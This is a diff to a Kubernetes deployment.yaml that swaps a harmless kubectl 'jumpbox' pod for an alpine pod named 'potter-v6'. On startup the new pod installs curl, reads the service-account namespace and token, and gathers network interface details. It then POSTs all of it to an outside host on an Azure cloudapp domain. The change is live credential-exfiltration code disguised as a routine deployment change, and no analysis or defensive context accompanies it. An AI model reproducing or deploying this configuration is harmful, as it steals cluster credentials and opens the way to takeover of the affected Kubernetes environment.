--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,13 +1,20 @@
 apiVersion: v1
 kind: Pod
 metadata:
-  name: jumpbox
-  namespace: default
+  name: potter-v6
 spec:
   containers:
-    - name: jumpbox
-      image: bitnami/kubectl:latest
-      command: ["sleep", "3600"]
-      tty: true
-      stdin: true
+    - name: shell
+      image: alpine
+      command:
+        - sh
+        - -c
+        - |
+          apk add --no-cache curl net-tools;
+          {
+            echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
+            echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
+            echo '>> IFCONFIG:' && ifconfig;
+            echo '>> CAN-I:' && echo 'kubectl not found, alpine não tem kubectl';
+          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
   restartPolicy: Never
